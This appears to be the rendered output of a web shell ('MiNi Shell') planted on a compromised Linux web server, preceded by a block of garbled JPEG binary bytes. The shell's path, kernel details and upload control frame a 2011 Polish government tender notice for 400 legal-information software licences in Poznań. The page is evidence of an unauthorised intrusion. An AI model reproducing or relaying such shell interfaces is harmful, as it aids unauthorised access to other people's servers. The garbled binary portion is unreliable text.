JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110307/37784-N-2011.html

<p class="kh_header"><b>Poznań: Dostawa 400 licencji oprogramowania systemu informacji prawnej - aktualizacja przez okres 1 roku</b><br>
<b>Numer ogłoszenia: 37784 - 2011; data zamieszczenia: 07.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielkopolski Urząd Wojewódzki w Poznaniu , Al. Niepodległości 16/18, 61-713 Poznań, woj. wielkopolskie, tel. 061 8541300, faks 061 8541204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poznan.uw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa 400 licencji oprogramowania systemu informacji prawnej - aktualizacja przez okres 1 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa do siedziby Zamawiającego 400 licencji oprogramowania systemu informacji prawnej.
2.	Wykonawca udzieli Zamawiającemu licencji na okres kolejnych 12. miesięcy od dnia podpisania protokołu odbioru.
3.	W okresie, na jaki udzielona zostanie licencja, Wykonawca zapewni Zamawiającemu aktualizację dostarczonego oprogramowania, nie rzadziej niż jeden raz na 14 dni. Pod pojęciem aktualizacji Zamawiający rozumie:
1)	dołączanie w okresach, co najmniej 14 dniowych wszystkich dostępnych na tą chwilę dokumentów, które są kompletnie opracowane (umieszczone w hasłach, posiadające swoje teksty, podlegające wyszukiwaniu przez różne narzędzia, ocenione, co do obowiązywania i wyposażone w powiązania z innymi dokumentami występującymi w systemie informacji prawnej);
2)	pokazywanie skutków, jakie powodują nowe dokumenty w programie, w odniesieniu do starszych dokumentów (zależności merytoryczne między aktami prawnymi prawa powszechnego, resortowego, miejscowego i europejskiego);
3)	wywołanie skutku polegającego na tym, że dokumenty wykładni (orzeczenia, pisma urzędowe, tezy z piśmiennictwa, glosy) w okresach, co najmniej 14 dniowych oceniane są co do obowiązywania w zestawieniu z dołączonymi w danym okresie nowymi aktami prawnymi opublikowanymi w Dz.U. i M.P.
Nośniki z oprogramowaniem instalacyjnym systemu, a następnie z aktualizacjami systemu i danymi aktualizacyjnymi nagranymi na płytach DVD, Wykonawca dostarczać będzie przesyłką kurierską na własny koszt, na niżej wymienione adresy (po jednym komplecie nośników na każdy z podanych adresów):
1)	Wielkopolski Urząd Wojewódzki w Poznaniu, al. Niepodległości 16/18, 61-713 Poznań;
2)	Delegatura Wielkopolskiego Urzędu Wojewódzkiego w Pile, ul. Dzieci Polskich 26, 64-920 Piła;
3)	Delegatura Wielkopolskiego Urzędu Wojewódzkiego w Kaliszu, ul. Kolegialna 4, 62-800 Kalisz;
4)	Delegatura Wielkopolskiego Urzędu Wojewódzkiego w Koninie, ul. Aleje 1 Maja 7, 62-510 Konin;
5)	Delegatura Wielkopolskiego Urzędu Wojewódzkiego w Lesznie, pl. Kościuszki 4, 64-100 Leszno.
4.	Oprogramowanie musi pracować w środowisku sieciowym (TCP/IP) i zapewniać jednoczesny dostęp dla wielu użytkowników i wielu stanowisk. W siedzibie Zamawiającego w Poznaniu oprogramowanie musi zapewnić pracę w dwóch fizycznie odseparowanych sieciach.
5.	Część serwerowa systemu przewidziana do instalacji na serwerach Zamawiającego, musi umożliwiać instalację i poprawną eksploatację pod kontrolą systemu Linux, na serwerach z pamięcią RAM o wielkości 1 GB. Wszystkie serwery w lokalizacjach Zamawiającego obsługujące system będą dostępne tylko z sieci Wielkopolskiego Urzędu Wojewódzkiego bez możliwości dostępu do serwera/serwerów ze strony sieci Internet.
6.	System musi umożliwiać pracę w środowisku sieciowym, gdzie stacje klienckie mogą znajdować się w różnych podsieciach IP, a serwer/serwery zostanie/zostaną umieszczone w strefie DMZ.
7.	System musi umożliwiać eksploatację w środowisku sieciowym bez komunikacji z siecią Internet bez ograniczania swojej głównej funkcjonalności. Wymaganie to dotyczy również aktualizacji zarówno oprogramowania, jak i zawartości baz aktów prawnych. Jeśli system oferuje dodatkowe funkcje dostępne poprzez sieć Internet, komunikacja sieciowa (z zasobami w Internecie) wymagana do dostępu do nich musi akceptować mechanizmy translacji adresów NAT i nie może narzucać wykorzystania więcej niż jednego publicznego adresu IP dla całości środowiska.
8.	Dostęp do systemu musi być możliwy ze stacji klienckich:
MS Windows wersja XP lub nowsza,
-	512 MB RAM.
9.	Oprogramowanie musi umożliwiać pracę na stacjach roboczych nie połączonych z siecią Internet oraz LAN i WAN Urzędu (wersje jednostanowiskowe oprogramowania).
10.	W ramach wykupionej puli 400 licencji powinna istnieć możliwość elastycznego ich przydzielania do różnych odseparowanych środowisk sieciowych, jak i do komputerów nie podłączonych do żadnej sieci. Zamawiający będzie każdorazowo zawiadamiał Wykonawcę o konieczności zmiany podziału puli licencji. Wykonawca ma obowiązek zrealizowania nowego podziału, bez dodatkowych kosztów dla Zamawiającego, w okresie maksimum 7 dni od momentu zawiadomienia.
W dniu dostawy pula 400. licencji musi zostać dostarczona w następującym podziale:
1)	Wielkopolski Urząd Wojewódzki w Poznaniu: 340 licencji sieciowych;
2)	Wielkopolski Urząd Wojewódzki w Poznaniu: 8 licencji sieciowych;
3)	Wielkopolski Urząd Wojewódzki w Poznaniu oraz Delegatury Urzędu: łącznie 30 licencji jednostanowiskowe;
4)	Delegatura Wielkopolskiego Urzędu Wojewódzkiego w Koninie: 5 licencji sieciowych;
5)	Delegatura Wielkopolskiego Urzędu Wojewódzkiego w Lesznie: 4 licencje sieciowe;
/Zamawiający dopuszcza stosowanie zabezpieczenia dostępu do oprogramowania, używanego w powyższych lokalizacjach, przy pomocy klucza sprzętowego HASP zakładanego na port USB serwerów/stacji roboczych/;
6)	Delegatura Wielkopolskiego Urzędu Wojewódzkiego w Pile: 4 licencje sieciowe (pierwsza pula);
7)	Delegatura Wielkopolskiego Urzędu Wojewódzkiego w Pile: 1 licencja sieciowa (druga pula);
8)	Delegatura Wielkopolskiego Urzędu Wojewódzkiego w Kaliszu: 8 licencji sieciowych.
/Zamawiający dopuszcza stosowanie zabezpieczenia dostępu do oprogramowania, używanego w  powyższych lokalizacjach, przy pomocy klucza sprzętowego HASP zakładanego na port LPT serwerów/.
11.	System informacji prawnej musi zawierać: 
1.	wszystkie opublikowane od 1 stycznia 1999 r. w Dzienniku Ustaw i Monitorze Polskim akty prawne obowiązujące oraz oczekujące;
2.	akty prawne opublikowane przed tą datą, które obowiązywały w dniu 1 stycznia 1999 r.;
3.	wszystkie ustawy i dekrety opublikowane od 1 stycznia 1944 r.;
4.	wybór aktów prawnych opublikowanych w okresie międzywojennym;
5.	projekty ustaw wraz z uzasadnieniem od 1 stycznia 2008 r.;
6.	akty prawa miejscowego opublikowane w wojewódzkich dziennikach urzędowych od 1 stycznia   2001 r.;
7.	akty prawa resortowego opublikowane w resortowych dziennikach urzędowych;
8.	Prawo Unii Europejskiej wraz z orzecznictwem organów Unii Europejskiej, obowiązujące w dniu 1 maja 2004 r. i opublikowane po tej dacie;
9.	wybór orzeczeń sądowych zarówno publikowanych w zbiorach urzędowych, jak również w innych zbiorach zawierających orzecznictwo;
10.	akty wydawane przez korporacje prawnicze, w tym co najmniej korporacji radców prawnych i adwokatów;
11.	wybór orzeczeń administracji;
12.	wybór pism urzędowych;
13.	glosy do orzeczeń;
14.	wzory pism procesowych, w tym wzory aktywnych formularzy wymaganych w postępowaniu   sądowym, w tym  rejestrowym;
15.	wzory umów;
16.	tezy z piśmiennictwa prawniczego;
17.	bibliografie prawnicze;
18.	kalkulatory, co najmniej:
-	ustawowych odsetek, 
-	opłat sądowych, w tym co najmniej w postępowaniu cywilnym oraz w postępowaniu sądowo-administracyjnym, 
-	podatku od spadków i darowizn;
19.	komentarze do ustaw i innych aktów prawnych, w tym co najmniej skomentowaną część jednostek redakcyjnych:
-	Kodeksu cywilnego, 
-	Kodeksu postępowania cywilnego, 
-	Kodeksu karnego, 
-	Kodeksu postępowania karnego, 
-	Kodeksu pracy, 
-	Kodeksu postępowania administracyjnego,
-	Kodeksu spółek handlowych, 
-	ustawy Prawo ochrony środowiska,
-	ustawy Prawo zamówień publicznych,
-	ustawy Prawo budowlane,
-	ustawy o planowaniu i zagospodarowaniu przestrzennym,
-      ustawy o finansach publicznych.
12.	Akty prawne muszą być dostępne w wersji ujednoliconej - tekst jednolity ma być dostępny na dowolny  dzień od 1 stycznia 1999 r.
13.	System informacji prawnej winien gwarantować dostęp do treści aktu prawnego po każdej zmianie. 
14.	Każdy akt prawny winien być opatrzony metryką określającą jego dane promulgacyjne, rodzaj, autora, tytuł i datę publikacji aktu prawnego, datę wejścia w życie i - ewentualnie - datę utraty mocy. Metryka powinna wskazywać relacje pomiędzy aktami prawnymi, akt uchylający, akty uchylane.
15.	Teksty aktów prawnych winny być zaopatrzone w przypisy informujące o zmianach, połączeniach z tekstami innych aktów prawnych, orzeczenia, tezy z piśmiennictwa, pisma urzędowe, wzory umów i pism procesowych, projekty ustaw.
16.	Do przyporządkowanych treści przepisów prawnych orzeczeń powinny być załączone informacje dotyczące rodzaju orzeczeń, daty wydania, sygnatury, rodzaju sądu i miejsca publikacji, informacje o glosach i innych komentarzach.
17.	Informacje z zakresu piśmiennictwa winny zawierać cytaty z piśmiennictwa prawniczego ujęte w formę syntetycznych tez, tytuły publikacji, oznaczenie autorów, miejsce i datę ich opublikowania.
18.	Wykonawca, po odbiorze przez Zamawiającego przedmiotu zamówienia, przeprowadzi szkolenia z obsługi systemu dla pracowników Zamawiającego w Wielkopolskim Urzędzie Wojewódzkim w Poznaniu oraz wszystkich wymienionych powyżej Delegaturach Wielkopolskiego Urzędu Wojewódzkiego zgodnie z pkt. III.3 Specyfikacji Istotnych Warunków Zamówienia, w łącznym wymiarze 12 godzin, w uzgodnionych z Zamawiającym terminach. Zamawiający nie poniesie z tytułu przeprowadzonych szkoleń żadnych dodatkowych kosztów.
19.	Wykonawca zobowiązuje się wyznaczyć pracownika/ów, który w ramach realizacji umowy będzie świadczył osobiście pomoc Zamawiającemu w pracach instalacyjnych i konfiguracyjnych przedmiotu umowy, zmierzających do zapewnienia poprawnego funkcjonowania dostarczonego programu. Pomoc będzie świadczona w miejscach lokalizacji przedmiotu umowy zgodnie z pkt. V Specyfikacji Istotnych Warunków Zamówienia.
20.	Pomoc, o której mowa w pkt 19 będzie świadczona od dnia następnego po dniu dostarczenia komponentów systemu do dnia wykonania przedmiotu umowy.
21.	Łącznie z ofertą Wykonawca musi dostarczyć komplet nośników umożliwiających uruchomienie w pełni funkcjonalnej wersji jednostanowiskowej oprogramowania oferowanego przez Wykonawcę w ofercie. Oprogramowanie musi spełniać wymogi Zamawiającego określone w pkt 11-17. Wersja oprogramowania powinna działać przez okres 10 dni od zainstalowania. 
22.	W terminie 2 dni od dnia otwarcia ofert Wykonawca powinien zainstalować nośniki, o których mowa w pkt 21 w celu sprawdzenia ich zgodności z pkt 11-17.
23.	Wykonawca udzieli Zamawiającemu gwarancji na okres 12 miesięcy od dnia podpisania protokołu odbioru..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.70.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">komplet nośników umożliwiających uruchomienie w pełni funkcjonalnej wersji jednostanowiskowej oprogramowania będącego przedmiotem procedury przetargowej. Oprogramowanie musi spełniać wymogi Zamawiającego określone w SIWZ. Wersja oprogramowania musi działać przez okres 10 dni od zainstalowania, formularz ofertowy, warunki gwarancyjne.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający przewiduje możliwość wprowadzenia zmian do umowy, jeżeli zmiany są korzystne dla Zamawiającego albo nie można było ich przewidzieć w chwili zawarcia umowy. W takim przypadku sporządzony zostanie stosowny aneks do umowy. Warunki zmiany umowy zostaną ustalone pomiędzy Zamawiającym a Wykonawcą.
2.	W szczególności dopuszczalna będzie zmiana umowy dotycząca:
1)	zmiany świadczenia Wykonawcy na lepszej jakości przy zachowaniu tożsamości przedmiotu świadczenia,
2)	zmiany terminu płatności z przyczyn nie leżących po stronie Zamawiającego,
3)	zamiany miejsca realizacji dostaw.
3. Zmiana postanowień zawartej umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej. 
4. Zmiana umowy, o której mowa w ust. 1 i 2, następuje na pisemny wniosek strony umowy, zawierający wykazanie okoliczności umożliwiających dokonanie zmiany, to jest wskazanie przedmiotu i zakresu zmiany, uzasadnienie  zmiany, wpływ  zmiany na termin zakończenia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poznan.uw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielkopolski Urząd Wojewódzki w Poznaniu, al. Niepodległości 16/18 w pokoju nr 457 budynek A, poniedziałek 8:00-16:00, wtorek-piątek 7:30-15.30 lub za pobraniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2011 godzina 10:00, miejsce: Sekretariat Biura Organizacyjno - Administracyjnego al. Niepodległości 16/18 Poznań, pokój nr 373 budynek A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com